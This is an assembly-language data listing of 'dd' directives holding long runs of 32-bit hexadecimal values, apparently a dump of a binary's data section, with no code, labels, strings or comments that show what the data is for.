dd 8AE6982Eh, 410E3855h, 0FA789500h, 0B4D6497Dh, 0CF780Bh
dd 30E821B1h, 23CE5E03h, 0C9839707h, 0F5000D06h, 7735640Ah
dd 9DC10070h, 0FC1E14D1h, 7700DD3Bh, 0CBD3C8FEh, 535629h
dd 9D16BA3Eh, 9BF68CB7h, 0E3DEC217h, 0BBE98400h, 7BF5CED4h
dd 262A0292h, 0EC3AC352h, 0FF01AF40h, 624C2EF4h, 0A1E00FDh
dd 0E3B58BEAh, 0EE6A38A6h, 5281EC01h, 0F47D5D32h, 200BC66h
dd 0C3B22FA5h, 0A89B44h, 9207430Eh, 248378F7h, 0CD528800h
dd 0F89C748h, 0B73D3A8Eh, 8C22DC80h, 1C2E408h, 721E7C24h
dd 0A550FD00h, 0F8ECC4CCh, 2A76032Eh, 3538FC6Ah, 0CA8F8CB0h
dd 0ED015Ch, 0B6B59C6Bh, 139F39D3h, 70B707Ah, 0F0FD2E6Ch
dd 0E9B8C283h, 33B41900h, 32434555h, 352E402h, 96DC12DAh
dd 3CB3A597h, 4607EB7h, 5242EBC5h, 27148A00h, 8801876Ah
dd 1E8F0272h, 0D8F5B3A4h, 8205D260h, 0DFAF7400h, 0D9C6E460h
dd 2D030027h, 20A3A44Fh, 0A00C4A5h, 0F015AD75h, 1DE29E1Ah
dd 26213F6Bh, 814000CEh, 0BC989506h, 0EC22D901h, 1661F34Ch
dd 0D0A0DCh, 2A29ABEEh, 4E8F876Eh, 0C193B300h, 61603139h
dd 0A0C5004Dh, 0B79BABD2h, 7D50DF65h, 540921F9h, 80F4E3B6h
dd 0A7AE17E0h, 31E40Fh, 64B8DB19h, 0F65FE11Fh, 0C11E7200h
dd 0E5BF9007h, 3CDA7681h, 63DA426h, 4D930380h, 604BA692h
dd 11DF0500h, 0FBD7545Ch, 3664003Ah, 369AF35h, 80033E5Bh
dd 5FF8DE78h, 0E07688CDh, 49C100BFh, 56D32F50h, 7E034CDAh
dd 35937BA2h, 0DD84F8FFh, 0FE330029h, 518E4312h, 3400078Dh
dd 0C2E88750h, 4526AFh, 0C40C2094h, 0A53F2918h, 410367FCh
dd 0DA46BC39h, 0F5F6B0D8h, 2CA60043h, 0F1B81E76h, 850039AFh
dd 0F8081DF4h, 187733Ch, 0D7E1E2BCh, 0EB77B1C8h, 1306AAC0h
dd 0F52FC100h, 0A39FC6E7h, 8670D8h, 0C0858E12h, 19556FF0h
dd 165FE800h, 8877806Eh, 0B3AB1C36h, 0F6D800Ch, 0F2ACB0D4h
dd 281A8D01h, 151C39BFh, 686940FEh, 67A700E1h, 0F06FD6DDh
dd 1D1F3F8Dh, 7FC0D2B4h, 0C08E9E22h, 807D0031h, 10810E6Ah
dd 13002BBBh, 0E7677CA1h, 0FBF3ADh, 969C748Fh, 2C284CB2h
dd 141E2500h, 18B4E967h, 0B8A20FBAh, 0C020F705h, 53B6EAD6h
dd 0BD49F201h, 464FE80Ah, 3DDBFCh, 0DEB9E348h, 3C0B885Dh
dd 5844D80Ch, 0F50C869h, 0EBFB0E3Ah, 10F77040h, 60006275h
dd 920C357Ch, 0A8995Eh, 0A9788C11h, 1FE18285h, 0E8F7DB00h
dd 0F92EB421h, 0D78A1614h, 8B270058h, 0C742FEBh, 3EDF3A00h
dd 7EE97CD5h, 0D86800C3h, 41C7FFC6h, 570027F0h, 55BDD775h
dd 28433Ch, 7DC4B9Ch, 82962DCBh, 14C2E600h, 88408756h
dd 472304FBh, 809EE906h, 0A818CD92h, 0BAAC8C00h, 855D64E1h
dd 0DA6A3CD1h, 9D715B83h, 0A9E8B5F8h, 4D00F354h, 2356B879h
dd 0C16C66h, 0B385C305h, 0D7508B47h, 0F81EAD01h, 0F9FBDFA0h
dd 0A29AF0h, 0DAC2D22h, 0CC3F691h, 87A0C7EAh, 6000F531h
dd 0A14368CBh, 3BA323DAh, 0B80151EEh, 7518D926h, 0B02BF42Dh
dd 9DD01900h, 0FEC2BB97h, 8C7B00ABh, 0ECEDD862h, 0A70FE9DFh
dd 3CFD239h, 0D805A617h, 0D0FA63h, 3A914E1h, 224513B8h
dd 3F009376h, 62C338C5h, 38EC475Fh, 328E0A55h, 366046EBh
dd 0AE52B9D9h, 0C679E400h, 0AF3A4B54h, 47895882h, 406C431Fh
dd 0B8072D74h, 0DA009073h, 9F5B2B7Bh, 25C989h, 0F9101BF5h
dd 0EAF176D9h, 1E48A0F2h, 518000B1h, 62A5B208h, 5F44001Ch
dd 3B6354E4h, 2370D30Ah, 0E107910Fh, 12FC20F4h, 0E44DECh
dd 0CD68E964h, 3D6709A4h, 33019877h, 7939E120h, 91E41DFFh
dd 0CE7D00D9h, 0C086FCCFh, 52389B59h, 3F958089h, 5F8D422Fh
dd 8F6D0007h, 0E9D0B72Ch, 0EF006909h, 0CA0DA661h, 0F7E0F77h
dd 0FB6B93F2h, 91602F6Eh, 0F428E08Eh, 0EC0044F2h, 4B941C24h
dd 857D9Ah, 0CF3FB8A6h, 228F16E2h, 1DD1FF00h, 815CA93h
dd 0A1C20375h, 0DB1CA41Ah, 8B4E5488h, 0A3209E03h, 0E8FEC914h
dd 1EAFB64Dh, 0C3026877h, 6EE42AAh, 0CC1695A0h, 4B7C0F0Eh
dd 778F23CAh, 2FD3C0A3h, 0EBED0017h, 3726A608h, 6C07013Ah
dd 0BC30C3D5h, 6AC49FC0h, 705C008Dh, 7A2DA069h, 0C903CFCCh
dd 0CB33B3FDh, 9FB9C832h, 9DBE00ACh, 0C0EB966Bh, 2F0982C6h
dd 0D45F271Ch, 0D0803EDEh, 33670277h, 1D00A9A6h, 23711C4Fh
dd 0EFD7214h, 283A077Bh, 0DDD72D00h, 0F600BF08h, 0E9A05D6Ah
dd 338BC9h, 0A2B0A116h, 0F1DA5C6Dh, 39AA7000h, 1AC4BC7Dh
dd 1A700DFh, 243C71FCh, 0DB001EF3h, 0F07184Dh, 9724302h
dd 87C21089h, 0B77F9B80h, 0AA3B3A85h, 0EA480786h, 2BC0E9C9h
dd 3C3869A5h, 1D3D138Fh, 92AB581h, 30D3B7E7h, 8E0EDD50h
dd 40062FD7h, 5AE1B8Dh, 537E9Bh, 18B554EAh, 335B91BEh
dd 6630E700h, 0ACD202FBh, 0DC6B02BFh, 5601F3CFh, 0D142BBE0h
dd 0E5446403h, 807463D7h, 0EAAE91AAh, 4CBD248Dh, 6FF50065h
dd 0DD161B77h, 45A54201h, 81E6F7E7h, 91F6C8h, 3B2520A6h
dd 6F936090h, 8F4AA12Ch, 14843400h, 0D1044h, 604D246h
dd 8B54A41Dh, 6C537C03h, 0B6EB0Fh, 1507A40h, 0F25A8866h
dd 60D83B00h, 2E367981h, 0BCA40023h, 0C9B8EC2Fh, 95FCB107h
dd 24533800h, 1B50EF8Fh, 79B4010Bh, 0DBB0D34Ah, 0A22CF4ACh
dd 0E6529A01h, 9C71645Ah, 2FFC60h, 0B73B8132h, 89B96A6Ch
dd 8E207F00h, 8D77E6E2h, 4F750111h, 1966A2A8h, 844C2063h
dd 3D028CF8h, 8FE77F5Ch, 868B60D0h, 0AC700D5h, 0C0DB93D4h
dd 3000B171h, 0A48F453Bh, 0BAD9CFh, 0C167375Ah, 40AA3CE8h
dd 9D002470h, 53A4F5C3h, 475D42h, 0E383C9C6h, 8446098Ch
dd 1E1D6307h, 0BD50F938h, 1F916F99h, 85B6A86Dh, 0C0FA92C6h
dd 5B4B6BA1h, 26F29600h, 5706CA9Dh, 0AFE222h, 0EA74F992h
dd 4770B21Eh, 0C801F27Eh, 6397350Fh, 0B870B723h, 51D01BDh
dd 8E3D2696h, 0DB29E8F8h, 0B2A9DFA0h, 369F7500h, 259A023Ch
dd 0A17000E4h, 3ADBF142h, 680019C4h, 56ADE564h, 38FA8D72h
dd 0E400D33Dh, 9405576Fh, 0CB0071C4h, 0F85B7F37h, 1FCDC0BEh
dd 6CB115h, 56BF8DE4h, 0B39FE66h, 37D38F41h, 93018036h
dd 1CBE9258h, 0C4E5Eh, 0BFC36EEDh, 0D403A027h, 0A6E14733h
dd 2611815Ah, 1D27AEBh, 8BAB05BCh, 20D2CE89h, 39003BE7h
dd 0F32037DEh, 0F010C5BFh, 0A6500E2h, 5DCB7052h, 0CF3BE4D1h
dd 2EB303AEh, 90B7B97Bh, 0F92BC3h, 2F04BA8Bh, 7C92FD58h
dd 3E0042E4h, 0CA0EF5AFh, 164BC37Dh, 2D2E76h, 74189DC0h
dd 4007726h, 236C5105h, 1F97D5E5h, 40687398h, 5678F203h
dd 70008B8Eh, 40B2480Dh, 9C3B5Bh, 0C018795h, 78321D21h
dd 2FE05774h, 0EB62D401h, 6C04C7D6h, 173C8BDCh, 0EF7E27h
dd 876B9593h, 0FB00A684h, 0C2F81148h, 0FCDE0C91h, 23FE1D3Fh
dd 0CF0E8EC1h, 343EB880h, 2B00A473h, 20BCAD15h, 390433h
dd 0F9A36ABEh, 2DBD5EC0h, 3EF05100h, 45B4179Ah, 52BF00EEh
dd 224E4DB1h, 2607A20Ah, 42D221A4h, 0CD15B241h, 0FF4A30h
dd 76659EEAh, 0A596BBDh, 5CF70B00h, 35749C82h, 0BC811E08h
dd 1C43C095h, 0D1DD48B1h, 6032C2B5h, 626968h, 49A6A1E5h
dd 65F85A55h, 75E4DF00h
dd 717AF7ACh, 80960068h, 0E6C973C6h, 0D200639Eh, 137998DEh
dd 0F629A91Ah, 9F70049h, 9C19DC93h, 0FD00E70Eh, 851A63A2h
dd 0FF33077h, 695587EDh, 0E3C72080h, 4F024C42h, 390AE3Fh
dd 500057CFh, 89E05CBAh, 93DF6838h, 101D0C62h, 8E35CEC0h
dd 8A9956h, 0FF4EE830h, 14FC460h, 38C96E00h, 569A8147h
dd 135E27Dh, 0CBADB882h, 0F808C7FEh, 8801B45Dh, 0E5349C84h
dd 0F4FCBD72h, 431509A4h, 5B876998h, 8EA58049h, 0BF003719h
dd 7AB57B70h, 1E2B91E5h, 470EFB39h, 5127D45Ch, 0E40AAB9Bh
dd 90000F4Eh, 0C3628FFDh, 74BACAh, 0D89EFAD1h, 91076BC7h
dd 1C56B400h, 64576AECh, 85830042h, 0F45C59E8h, 0A9265D46h
dd 9800BC1Fh, 0F6EECF32h, 0AA960021h, 1DA672Fh, 0E000BAA1h
dd 0DE2B283Ch, 5A27A2h, 2E9269B4h, 0CA9F01A5h, 53AEBF00h
dd 0C2E556CDh, 4E7D3DC8h, 79E0799Dh, 0A8B6FE00h, 0D89C41F1h
dd 8D9F6E00h, 0F6B95F4Dh, 71670B1Ah, 4D07B474h, 0F088A03Ah
dd 6100FD02h, 0EB08ED9Dh, 801E6Bh, 5DF3F4A6h, 0B7A781AEh
dd 0F5CB9900h, 97EABD2Dh, 7A840032h, 42A62134h, 431CD4C6h
dd 6A435810h, 88BBC9CEh, 8FB039h, 0C10A335Eh, 1E98D4E4h
dd 99A72D00h, 26F62A5Ah, 586D00E6h, 0AF3197CEh, 1DF83E79h
dd 0F545B200h, 25D84CFEh, 0E4C30020h, 60E6C49Eh, 0B1FE4F4Bh
dd 12987000h, 0D78B07B4h, 0AFF0064h, 0D63433A4h, 0E3E16BEh
dd 0BFE8809Ch, 0FFF4130Bh, 71510065h, 3C1FFA26h, 5201EC45h
dd 2D770F01h, 98C4CF56h, 20080089h, 6A8E3BD2h, 0E69886FDh
dd 0B1706328h, 233A5100h, 1FD5CC92h, 6F800046h, 3B8E397Dh
dd 800B79Eh, 13DB858h, 8BAA65h, 844FFD0Eh, 0A1A757A5h
dd 879CB100h, 0F66092F0h, 72800029h, 5D7031C5h, 8A3B9B32h
dd 0C9E3AEBAh, 29C22803h, 0A7F988E9h, 0BBF60003h, 0B67BFE1Ah
dd 85005306h, 2A4F220h, 0A79108h, 3ED293E0h, 0E1154DC1h
dd 763D95Ch, 69BB5478h, 74F4D100h, 650C0099h, 2BF62A0h
dd 750068DEh, 357B8247h, 716E10D1h, 11E60013h, 813D39BEh
dd 0F60F21CCh, 8045C00Fh, 0F5A5D42Ah, 58A300B7h, 2BD5E927h
dd 0EDF81A4Bh, 38773307h, 2A50EC15h, 25A0CDDCh, 960EF5Fh
dd 8006B84h, 820328EDh, 0E2575F2h, 0DC4355BBh, 0A6473A60h
dd 35014A0Fh, 7D0EA0F7h, 126007F9h, 2161483Fh, 0CEAC5203h
dd 0AAB0BB90h, 0C501D655h, 536CB0BEh, 0FB207579h, 0E7A01F05h
dd 99C100D5h, 2718E2BBh, 0D1B9800h, 0C86E1541h, 0FD740336h
dd 91FB5FC9h, 0E09419B8h, 38D0FA0Bh, 75E68097h, 0E4650CBh
dd 4308BE26h, 1B53440h, 980015D9h, 4DEBF27Ah, 5B4F21h
dd 33BCEDCBh, 76A6F0B8h, 5975A313h, 7FE2C00h, 0B9926Ah
dd 98405D24h, 9D2704ABh, 99724C00h, 0FF2859F6h, 0D11800C2h
dd 0A5E29A5Dh, 0BB26E8C4h, 0D600428Dh, 0D4416209h, 74230287h
dd 0E2AE02C7h, 0B57C0AC0h, 35111400h, 524148CCh, 0E45B3A0Bh
dd 31092C8Eh, 0ABCDE600h, 1107E51Bh, 0C8D559BDh, 0C78E4A0h
dd 8561003Dh, 0D0676E79h, 927D8637h, 0A65AA80Eh, 56E82116h
dd 38EC19A4h, 836B389Dh, 3E2DB880h, 583527E0h, 90B9A600h
dd 0E3D9FFA0h, 0EFF70061h, 371FA542h, 0E8024E68h, 8F97ACC1h
dd 0F97E609Bh, 2B783Bh, 0A63A4DFDh, 0E6D2E445h, 7FDCF501h
dd 0C3FA0FADh, 1CABD8h, 0B1BFFD23h, 0E2201A42h, 0B9AE9A00h
dd 2E834798h, 84720396h, 0CBA62C70h, 0B64319D0h, 25B04F00h
dd 2D2079D3h, 4A760046h, 7D40683h, 1C001EA6h, 0AE2A3509h
dd 0FB6A5Ch, 0A418DA31h, 5EAC56C2h, 0A03AFD00h, 7F5BEB98h
dd 97DC0E11h, 0A9E7C8AFh, 804EF306h, 386327C8h, 0F57B700h
dd 1881FCD6h, 0A05B0033h, 991F82AAh, 0F000797Dh, 3A8942C8h
dd 0A096CEF2h, 0C2E4A0h, 0F17F8D84h, 0E2B27CA9h, 0A6943F00h
dd 0B81D12D0h, 2CF4F9D3h, 0C21900FAh, 634450F3h, 8E04AD5h
dd 7D0C5100h, 0E920DAE4h, 42A20F24h, 0E0E028EEh, 0A4442F74h
dd 9B57FD00h, 324D0F89h, 523B0FE1h, 2A80F0CEh, 0DC42D7Eh
dd 0A50AF50Ch, 333DA7Bh, 28BB53Ah, 659894B2h, 54F076BAh
dd 0EAEA0628h, 3B7E9900h, 4CDDE1Eh, 83863809h, 98113400h
dd 6DD69BE6h, 7DB5B200h, 49A40E9Eh, 0BEF50023h, 2342AE4h
dd 62005127h, 827D7BDCh, 3FF8A174h, 0B0004139h, 0F7C1B183h
dd 0AE07DE57h, 0F14A4A0h, 0E1F220FFh, 37EE682h, 2D4DD1C9h
dd 26D8DC7Dh, 4600AE96h, 66325264h, 6841FFh, 0CAEACF92h
dd 4E04CE0Ah, 69670600h, 3C7DD264h, 0D0BE1E43h, 0FA998F58h
dd 6054EA47h, 7DE681B9h, 3C0075E0h, 7E7EE7Fh, 6F185h, 0DBCC016h
dd 2F24EF12h, 0EAA71B00h, 3B14E0A8h, 504D756Fh, 89C44Ah
dd 6A416917h, 0FAAF4287h, 0C02BAE07h, 4C0015D6h, 5EA0CFh
dd 0CEE957F0h, 47E302C5h, 0EBDB0C14h, 5B7D05B0h, 0C0D4A7h
dd 1C25C4D7h, 805823E8h, 0BCC14B6Fh, 7600B9D2h, 9245668Eh
dd 4AB601h, 4D9A62DDh, 4A54361h, 75AD9600h, 89280A65h
dd 0B54800A3h, 72328E81h, 0EB03F3DFh, 0B6BDA9Ch, 599690ACh
dd 0C3C20053h, 6A3B077h, 78001F18h, 1664F61Bh, 1085D56h
dd 0F1894FC6h, 0D8D70287h, 2E00B668h, 7240D55Ah, 694AA6h
dd 7855B7CAh, 6C069CA5h, 0D8AFC000h, 34AE0C3Eh, 24B10081h
dd 0D3430D20h, 0BB00B34Fh, 70FFDB30h, 962C26h, 957B6081h
dd 8E4DAC1h, 2D3C9300h, 0A99A0561h, 0B21501CEh, 0EC2F0C31h
dd 4FE63014h, 0C038211Ch, 6F6B49C0h, 3886219h, 84064655h
dd 1DD0E727h, 7D055AE5h, 22B283A0h, 0D98E0EBEh, 3A5C4140h
dd 0BC0BA182h, 8F2A1Ch, 0B2EE8AF1h, 343204F0h, 8165B14Ah
dd 0ED569C6Ch, 6A68D01Eh, 7E401600h, 0A4A74A3Ah, 6D7000D3h
dd 0C3B8711Ah, 997DB623h, 8116AB0Eh, 0C9E8019h, 0AF1EFCh
dd 8F7658E0h, 0EA5D443Eh, 80002278h, 352394E1h, 0C0B12130h
dd 0A7150A72h, 8B07A332h, 1E6A5DF8h, 22AE5C20h, 0D5C500FBh
dd 246CD6A0h, 30010296h, 46A7F8F5h, 62302014h, 820C0F22h
dd 0D1E0A88Ch, 0C4BF40EFh, 869582Ch, 141EDA00h, 1F3E5187h
dd 0BD0D487Ah, 816E3F00h, 0D7E2E966h, 0CC0C62FEh, 0B4A39801h
dd 0FD04001Dh, 5C0320ABh, 7C00C4E9h, 0AAA9E07h, 8ED31h
dd 657C1B5h, 7244EA38h, 4A205000h, 234DD01Ah, 3AC900D5h
dd 0A39791A8h, 6E00F16Ch, 0B860BF70h, 1F755FF3h, 0BC7CCB35h
dd 2CFBD083h, 16980406h, 6603FC65h, 0C2DD44E1h, 0E8A2A843h
dd 91E9008Fh, 8C9B58C6h, 490080BEh, 2A88FBC9h, 7F9FA7h
dd 587B56D1h, 0C29AEEAEh, 0B70F57E6h, 0A0F09067h, 7589A22Bh
dd 0D168009Eh, 7CB58FB2h, 93003A6Dh, 0DEF1E05Bh, 65C2B4h
dd 89B6E10Fh, 0E47CD171h, 3C33C100h, 91960108h, 3E839C9h
dd 0AEAFCD0Fh, 0F366839Ch, 0C1B08E16h, 2E00447Eh, 0B47CA367h
dd 0B83D5Eh, 927CCF9h, 5D301701h, 63188D18h, 0FE327DBEh
dd 0F74E0069h, 0F40AD5ABh, 240005D1h, 9AD85FFFh, 3F5E3E1h
dd 5A3C8B19h, 4C8D3F9h, 6C051464h, 0DE733D95h, 9944A483h
dd 6BF43EECh, 11720067h, 73F2E555h, 0CA0F7F19h, 0EEE3CB3h
dd 0BE1B8099h, 16CB3BACh, 17AEF5h, 149DA210h, 0D613CD80h
dd 0FC00FF78h, 971A7B45h, 3CCE00D8h, 0FC24E68Dh, 7205392Ch
dd 5D58E4F6h, 440E6585h, 8C49A50Dh, 0E775B2C0h, 0E1B00A2h
dd 57C7AF3Fh, 99009521h, 68C2112Ah, 0ED7F26h, 4C02E832h
dd 0F2226CA0h
dd 4002EF8h, 904B01C1h, 5ADD93h, 5F8F8353h, 0F33723E9h
dd 754C5801h, 67181F9Ah, 43F05BF1h, 416448AFh, 5DC81900h
dd 8983E654h, 0A9EBF500h, 1EF0998Dh, 0DE230085h, 6928C21Fh
dd 2B004E9Ah, 0B510CD38h, 0BDE668h, 0D00B7103h, 0ADE45E29h
dd 80704D3Bh, 4E313342h, 0E056CBh, 1647F615h, 6396BA2Fh
dd 7FD04500h, 0F299BC67h, 6D97001Bh, 93C84AEFh, 4E008247h
dd 0FC0F70FAh, 190765h, 9E26D494h, 0A0C28DD2h, 92AD271Fh
dd 6F40D09Eh, 9BEBF9D5h, 25830024h, 74F8A97Fh, 0FA001809h
dd 0DE5BBAE3h, 0FDBE8Ah, 83F98619h, 0B2100252h, 0D139A500h
dd 28AB227Fh, 0D3690023h, 0CEBB82A2h, 0CB0F42B9h, 877B6E5Ch
dd 4C207827h, 8C67FFh, 65452D6Dh, 493884F0h, 0A6BCEA00h
dd 4269D56Ch, 0F87400E7h, 85CD63E3h, 960070D9h, 98470893h
dd 76EAC5h, 679C615Ah, 38D3D6ADh, 0CC2D9F00h, 74C3F088h
dd 758B14D8h, 0D03CA45h, 0B18A5ED9h, 6006D0A8h, 924C6F73h
dd 24720032h, 43B014C1h, 0F829144Dh, 8600AC84h, 0AA5692DEh
dd 0FCF4CCB5h, 6D072D00h, 0D3E3A8E4h, 327B75h, 0E89B0B33h
dd 2095D2AFh, 41F8F21Ch, 63FF8142h, 28A86058h, 0AC803931h
dd 0D69D800h, 179F326h, 4E019B98h, 0B7296254h, 831D532h
dd 2ED8F7F1h, 9BEE00D2h, 7706DB7Fh, 0D7F87C05h, 4B3BF800h
dd 0B3A4FB84h, 0A6FC96h, 0A929DFF2h, 797B7D6h, 153CB5Ch
dd 0E6E9580Ah, 5FF8B5C9h, 0DDDE00D7h, 39654629h, 1B98E56Bh
dd 50C2BC00h, 0FC12A6C4h, 5445009Eh, 0A9F08210h, 0D601A206h
dd 1899F863h, 0D2F020DFh, 5BA70085h, 0D802F3FBh, 3200AF0Bh
dd 0B303AA6Eh, 7D96D3Bh, 0D149AC4h, 27C810F6h, 0F100195Fh
dd 0BF89674Ch, 0E66553A0h, 3E920052h, 77B57901h, 4F00DA49h
dd 0DE44E2DFh, 89F92Ah, 0BBCB6B3Dh, 40B3AA62h, 9456BE00h
dd 2D29C664h, 39D800C1h, 5AA90258h, 17017C20h, 6291476Bh
dd 0B9C4748Ah, 1CC35830h, 0EC79CE00h, 0A0AA6B26h, 36504203h
dd 0E00FE8D5h, 0ED96DAh, 7024A2D0h, 9D046B68h, 0F4471000h
dd 467BE9C1h, 0FE920ED7h, 4F60979Bh, 1EA0EDCh, 0F5C3200h
dd 0A0BBD4D1h, 64630134h, 95688B61h, 0A5D26038h, 1B9F0600h
dd 0FA9D2FB8h, 0AF8D3D24h, 0F601CABAh, 0DDEE5E69h, 70A0F4D2h
dd 0AC145107h, 89003892h, 1D70C5Ch, 4EF8E85Fh, 0F49F0DC5h
dd 8600D8D1h, 7C32BCB1h, 0A11E6Ch, 79FE9C1Fh, 0ABB57696h
dd 0C8FDC600h, 0A645190Bh, 933C001Ch, 0E4CDDEBBh, 2E00A338h
dd 0F9D68D4Dh, 75E351h, 0FE8EFCD4h, 0E76F08B3h, 9E7EDF02h
dd 80AD6D4Eh, 0AA7333FAh, 21D7CB2h, 0E9A707FDh, 0BC8381CCh
dd 27885023h, 19002D5Dh, 0B1D872D2h, 0ECE4DFh, 984D039Fh
dd 0C640DC18h, 28164B00h, 5B0C97B4h, 0F78001Ah, 8D55D152h
dd 0EB00A3F5h, 0D4E3AD3Ah, 1238654h, 24A4381Ch, 300E0B74h
dd 6400725Fh, 33FB1BFh, 0F2BD949h, 68DC0745h, 996C5CE0h
dd 0DA00374Ch, 0D9E82A22h, 0CB70C2h, 861129FCh, 0B0FA129Ch
dd 87C3573Ah, 562F303Ch, 0E64FAE80h, 0BC58001Dh, 43CFFC81h
dd 6C00757Eh, 67291747h, 2C3A9Bh, 2AE11C19h, 5D22AFE7h
dd 91005972h, 0B29E099Ch, 0E0E540EEh, 55080082h, 8E159203h
dd 0C40E3489h, 0A0BD8830h, 0A94DB161h, 6CD00093h, 0C0B5A58Bh
dd 0EE005709h, 7D1FFD5Fh, 1C7662CFh, 0C0E07F93h, 0ADF16AC1h
dd 0F8001657h, 0D7072656h, 70AEA212h, 0D4FE62h, 4908742Ah
dd 8FFA2B99h, 5180BF03h, 0C8C7713Dh, 258DE3h, 21321284h
dd 0E4A66366h, 6828901h, 9F83415h, 9D56CCh, 0EE94D44Fh
dd 740FE329h, 8BCED60Eh, 0B9986050h, 630AFDh, 0BACDC21Ah
dd 9E8D4157h, 1293A317h, 0A4BE1307h, 0D67C6110h, 921E00A7h
dd 130F3A71h, 693C2B86h, 32BB802Dh, 0D55EE5DCh, 7D610080h
dd 99DF23B3h, 6F7F969Bh, 32F14Ch, 0D645413Ah, 30E875Dh
dd 7EEEDD4Dh, 79E853D8h, 0B3000FC5h, 35911088h, 9C1C3Ch
dd 0CADCA9E8h, 67E40922h, 0FAD46800h, 0B7587720h, 0A37500B5h
dd 0B3F47462h, 0A400291Ch, 1338F052h, 2C182B95h, 24ACF6D8h
dd 6ABE00FEh, 21426080h, 40E12300h, 0EF4B04F9h, 0C2C50155h
dd 0F65E9F0Eh, 0EC2CDC49h, 66248200h, 57C75F9h, 13610062h
dd 0CD58FFCh, 7F072C01h, 0EA83DB59h, 89E39DD0h, 0E4CE28Ch
dd 3588CF08h, 49CE8E20h, 0EF00C6D7h, 594EE3CBh, 0E80D026h
dd 0FDB46388h, 0BD1E7000h, 5C00CFDBh, 0F0E5C622h, 35ADC5h
dd 988C5B3Eh, 5E4806FFh, 0A4454D00h, 93F2D450h, 0AB803C75h
dd 0EB62E780h, 38C8846Eh, 0EFE6D500h, 872FE5C3h, 2BA01E5Fh
dd 3F4EC05Dh, 0D729BC10h, 4BFBEB00h, 43BD3C92h, 0E21A0035h
dd 4812FF2h, 661E36ADh, 2D2CA0AEh, 0F7DA6F01h, 64D892C5h
dd 1FC3E4DBh, 0CF1618h, 0DF3A8D69h, 4900F09Dh, 13F29CF4h
dd 4C7EF8A8h, 0E93E1B48h, 0F3E48C80h, 7F9A4C2Fh, 0C88558h
dd 42D0FCBh, 315792h, 3561E87Ah, 0DADD8F2Ah, 3C524500h
dd 0CCD3ABF2h, 0E9D00019h, 47952763h, 4E0004CDh, 0DBC2578Ah
dd 0CE1A14h, 0F6F9077Ah, 5570A7FAh, 981E5A00h, 0FE0AD374h
dd 0E59F883h, 0F25C5881h, 68B065C0h, 600907Ah, 6CCCC342h
dd 3F5F7271h, 0E01EBC17h, 9FDC40A2h, 0A3BD0614h, 3C00E572h
dd 0C83A8047h, 0B9C57h, 0FD3EBC43h, 285CC05h, 0CF0EE770h
dd 0E02187FAh, 645E9372h, 3E03E2FCh, 2700C814h, 0A3706D1Ch
dd 6000820Bh, 26244549h, 0FF753C23h, 39811D4h, 0E5AF20A0h
dd 0C988B64Ch, 0BE286E0Dh, 7288529h, 0E101E28Ch, 1E661F54h
dd 4FF04E7Ah, 811D00F2h, 0FCC8629Ah, 4D74445Bh, 1C471502h
dd 8086D207h, 0CA0A01EEh, 0A23A00CEh, 15651EF6h, 0A400321Ch
dd 365ADF93h, 0FABFE695h, 7B5F002Ah, 0E0BA4BF2h, 4F06CFCh
dd 32547D0Eh, 7C007FCAh, 5C88686Fh, 34678BDh, 3876FA27h
dd 0B5B00847h, 1B00252Bh, 826F6119h, 4ED9Ah, 6CD6EC83h
dd 63028D8h, 1C013300h, 163E2F3Ah, 0E1A30092h, 0D83B6610h
dd 0BB00F0E8h, 1E588E43h, 0FDA73EAh, 92E48FBDh, 0F680A429h
dd 82362508h, 0CFE2141Ch, 0BDE35D80h, 0FCA78CBh, 0A801CDF5h
dd 0B9032D00h, 0C070E756h, 84F7E105h, 21C0C40Ch, 4885DB0Bh
dd 44009364h, 0E004D121h, 0E358D3EDh, 0D276003Eh, 0C747BB61h
dd 95B20085h, 66605F6Fh, 0D4E1913Fh, 6E44251h, 7B393501h
dd 4CB112D9h, 6879FCh, 0A3A652EAh, 0BD5ECFB0h, 883A93EEh
dd 9BE59299h, 0FC8A1E03h, 4935A891h, 80A500ACh, 9C713CEBh
dd 4D00741Dh, 0E4413468h, 0BEF0ED1h, 0B2161484h, 0DE863100h
dd 0BF00A79Ah, 1852ACD8h, 3EF64121h, 26B91BF7h, 95F4C981h
dd 0F06157E4h, 14003E8Ah, 433C0145h, 4C6B7819h, 75EFA2h
dd 2793B2E7h, 0B8B18005h, 711F3400h, 0F1A002CBh, 0A2BE0E37h
dd 49E0B9AAh, 4D78B4FEh, 253DFB00h, 0FD469F33h, 8C691CB3h
dd 0A403C0CDh, 8A1BF58h, 28678F00h, 13E5D252h, 0BC2300E3h
dd 7CFC18A9h, 0C401214Eh, 8DD7E078h, 19EC4784h, 0B8120111h
dd 39B0D93Fh, 9E21ECCFh, 5DB54600h, 0DB45A956h, 0FBEA03h
dd 0E54101E8h, 0FA20CDF4h, 0AB0066E0h, 3C3057F6h, 1EE21E9h
dd 7AC50F8h, 0F870DD90h, 1D005C3Bh, 8FD83968h, 0B0A834h
dd 0C7CF02C4h, 0F3C6840Dh, 0F4633D00h, 0FC9A3E7h, 1A5C00FAh
dd 6B6CF698h, 861D9287h, 0C200CD2Eh, 0CFD17F68h, 0AF8F09FEh
dd 0B6008A4Dh, 251FC3Eh
dd 0CED07600h, 0B1C6560Fh, 5B0032Bh, 3263BAB2h, 148B6FA8h
dd 0F5711100h, 0A2D902BDh, 2CD51DA1h, 0A4DBCE30h, 6DFFEF00h
dd 7F03ADDFh, 0DA4DA244h, 9371F07Ah, 788E006Ch, 12580FB4h
dd 5A00CD3Dh, 57C4BAA5h, 0A6421Fh, 18415076h, 0A4C898DBh
dd 0E5AE840Eh, 0EA85A030h, 7283100Ah, 0FE76005Dh, 0F22A111Fh
dd 13005207h, 0CD89CB5Ah, 257AA3h, 30875185h, 0FCB916C9h
dd 0A976BB26h, 59634500h, 16F94C8h, 3A396C37h, 0E805AE6Bh
dd 3E07E7CFh, 11AD5DA0h, 96DC2D51h, 19FE2FCh, 0E5751E7Dh
dd 0F745C56Ch, 60CA5CA8h, 0E04F5000h, 5BBC21AAh, 0F96800EBh
dd 0D57FE8BBh, 2B005A09h, 5EC3878Ah, 0BACAD15h, 74274EBh
dd 0F0C4A7C1h, 31000B89h, 0DEC67CF0h, 3EAE499Dh, 0D207CE08h
dd 152B7FF2h, 0FBD2C0A8h, 8400D934h, 0CE483CBEh, 1D306DCFh
dd 0C0B8182Fh, 0F03E9DBDh, 0E2003355h, 6B224D6Eh, 0F8B5762Bh
dd 1F5C003Ah, 0E00A0286h, 0C80941DEh, 800F7E6Fh, 89A1FD99h
dd 217100B5h, 49402D11h, 1303BF5Eh, 90D99E6h, 0EE4C00B1h
